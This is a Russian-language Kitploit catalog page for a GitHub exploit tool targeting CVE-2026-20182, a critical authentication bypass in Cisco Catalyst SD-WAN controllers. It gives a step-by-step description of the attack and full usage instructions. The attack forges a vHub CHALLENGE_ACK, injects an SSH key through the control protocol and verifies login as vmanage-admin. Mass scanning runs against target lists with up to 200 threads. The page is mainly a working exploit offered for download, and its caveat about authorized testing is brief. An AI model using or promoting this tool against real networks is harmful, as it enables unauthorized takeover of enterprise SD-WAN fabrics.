Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-20182 — Обход аутентификации пиринга Cisco Catalyst SD-WAN | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2026-20182
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияСетевая безопасностьТестирование на ПроникновениеRed Teaming
GitHubnxploited/cve-2026-20182

CVE-2026-20182

Обход аутентификации пиринга Cisco Catalyst SD-WAN

Репозиторий
1284 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-20182

Cisco Catalyst SD-WAN Обход аутентификации пиринга

CVE-2026-20182 — Обход аутентификации пиринга Cisco Catalyst SD-WAN

Инструмент оценки для авторизованного тестирования обхода аутентификации пиринга Cisco Catalyst SD-WAN Controller / Manager (CVE-2026-20182).

CVECVE-2026-20182
SeverityCritical (CVSS 10.0)
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
ProductCisco Catalyst SD-WAN Controller (ранее vSmart) · Cisco Catalyst SD-WAN Manager (ранее vManage)
IssueМеханизм аутентификации пиринга не применяется корректно
ScriptCVE-2026-20182.py

Краткое описание уязвимости

Май 2026, уведомление: Ошибка в рукопожатии управляющего соединения / аутентификации пиринга позволяет неаутентифицированному удаленному атакующему обойти аутентификацию и получить внутренний доступ с высокими привилегиями к уязвимым системам.

Атакующий отправляет специально сформированные запросы на уязвимую систему. В случае успеха атакующий может аутентифицироваться как внутренняя, высокопривилегированная, не-root учетная запись и получить доступ к NETCONF, что позволяет манипулировать конфигурацией SD-WAN фабрики.

ПунктДетали
Вектор атакиСеть
Необходимые привилегииОтсутствуют
Взаимодействие с пользователемОтсутствует
Область действияИзменена
ВлияниеКонфиденциальность, целостность и доступность — Высокое

Рекомендация: Примените исправления безопасности Cisco в соответствии с официальными рекомендациями поставщика. Ограничьте доступ к плоскости управления, контролируйте соединения плоскости управления и проверьте контроллеры SD-WAN на наличие несанкционированных изменений конфигурации.


Контакты

Telegram: @KNxploited


Предварительный просмотр консоли

CVE-2026-20182 operations console


Инструмент: CVE-2026-20182.py

Фреймворк эксплойта на Python 3 для CVE-2026-20182 против Cisco SD-WAN vdaemon (UDP/DTLS 12346).

Что он делает (пошагово)

ШагФазаОписание
1Загрузка целейПарсинг targets.txt, слияние дубликатов по (host, domain_id, site_id)
2Проверка OpenSSLЗагрузка общих библиотек OpenSSL 3.x/4.x для пользовательского DTLS
3Подключение DTLSПодключение к целевому UDP-порту (сначала 12346, затем опционально список портов)
4CHALLENGEПолучение от сервера CHALLENGE (0x08)
5CHALLENGE_ACKОтправка поддельного CHALLENGE_ACK как vHub (тип 2) — обход аутентификации
6HelloЗавершение обмена Hello — подтверждение пути обхода
7aРежим CHECKОстановка здесь — запись только bypass / Hello OK (без ключей, без SSH)
7bРежим FULLВнедрение открытого ключа SSH через VMANAGE_TO_PEER
8Подтверждение InjectОжидание REGISTER_TO_VMANAGE (0x0D) в качестве подтверждения протокола
9Проверка SSHТестовый вход как vmanage-admin на TCP 830 (NETCONF), опционально 22
10ВыводСортировка результатов в файлы уровней + удобочитаемый список команд

Возврат фабрики: При TEAR_DOWN или несоответствии параметров повторяет альтернативные предустановки domain/site (1,100), (1,1), (0,0), если не указано --no-fallback.


Уровни результатов (внимательно прочитайте)

УровеньФайлЗначение
01 — Подтвержденный SSHcisco_sdwan_01_confirmed_ssh.jsonlssh_verified=true — единственный уровень, считающийся полным доказательством компрометации
02 — Только Inject ACKcisco_sdwan_02_inject_ack_only.jsonlПротокол принял внедрение ключа; вход по SSH не удался
03 — Только Bypasscisco_sdwan_03_bypass_only.jsonlHello/bypass выполнен; подтвержденного внедрения нет

Важно

  • Режим check → максимум уровень 03 (зонд обхода). Не является доказательством полной эксплуатации.
  • Режим full → стремитесь к уровню 01 (ssh_verified).
  • https://host в списке → только подсказка TCP веб (80/443). Не UDP DTLS на 443.

Требования

ТребованиеПримечания
Python3.9+
pipcryptography, rich
OpenSSLОбщие библиотеки 3.x или 4.x (libssl + libcrypto) — обязательно
pip install -r requirements.txt

OpenSSL (система)

Windows

  1. Установите Win64 OpenSSL 3.x или аналог
  2. Добавьте bin\ в PATH, или укажите:
OPENSSL_HOME=C:\Program Files\OpenSSL-Win64

Linux

# Debian/Ubuntu
sudo apt install libssl3 openssl
export LD_LIBRARY_PATH=/usr/lib/x86_64-linux-gnu:$LD_LIBRARY_PATH

Инструмент завершает работу при запуске, если OpenSSL не загружен.


Быстрый старт

Интерактивное меню (по умолчанию)

python CVE-2026-20182.py
  • Настройте параметры 1–11, затем 0 = ЗАПУСК СКАНИРОВАНИЯ
  • Режим запуска по умолчанию: check (безопасный зонд обхода)

Неинтерактивный режим (автоматизация)

python CVE-2026-20182.py -y

Режимы запуска

РежимФлагВнедрение SSHПроверка SSHИспользовать, когда
CHECK--mode check (по умолчанию)НетНетМассовый скрининг, обнаружение обхода
FULL--mode fullДаДа (кроме --no-ssh-verify)Доказательство компрометации

CHECK — только зонд обхода

python CVE-2026-20182.py -y --mode check

FULL — внедрение ключа + проверка SSH (только авторизованные цели)

python CVE-2026-20182.py -y --mode full

Справочник CLI (каждый флаг + пример)

Цели и рабочие потоки

-f / --file — список целей (по умолчанию: targets.txt)

python CVE-2026-20182.py -y -f my_controllers.txt --mode check

-t / --threads — рабочие потоки (1–200, по умолчанию 12)

python CVE-2026-20182.py -y -f targets.txt -t 30 --mode check

--domain — DOMAIN_ID по умолчанию, если не указан в списке (по умолчанию: 1)

python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 100 --mode check

--site — SITE_ID по умолчанию, если не указан в списке (по умолчанию: 100)

python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 50 --mode full

Режим и автоматизация

--mode — check | full

python CVE-2026-20182.py -y --mode full -f targets.txt

-y / --yes — пропустить интерактивное меню; использовать только значения CLI

python CVE-2026-20182.py -y -f targets.txt --mode check -t 20

Проверка SSH

--no-ssh-verify — пропустить тест SSH после внедрения (не рекомендуется в режиме full)

python CVE-2026-20182.py -y --mode full --no-ssh-verify -f targets.txt

--verify-ssh22 — также попробовать TCP 22 после 830

python CVE-2026-20182.py -y --mode full --verify-ssh22 -f targets.txt

UDP / фабрика

--no-try-list-udp — только UDP 12346; игнорировать :port из списка

python CVE-2026-20182.py -y --no-try-list-udp -f targets.txt --mode check

--extra-udp-ports — лаборатория: дополнительные UDP порты на каждом хосте

python CVE-2026-20182.py -y --extra-udp-ports 8080,8443 -f targets.txt --mode check

--no-fallback — отключить повтор domain/site при TEAR_DOWN

python CVE-2026-20182.py -y --no-fallback -f targets.txt --mode full

Логирование

Скачать инструмент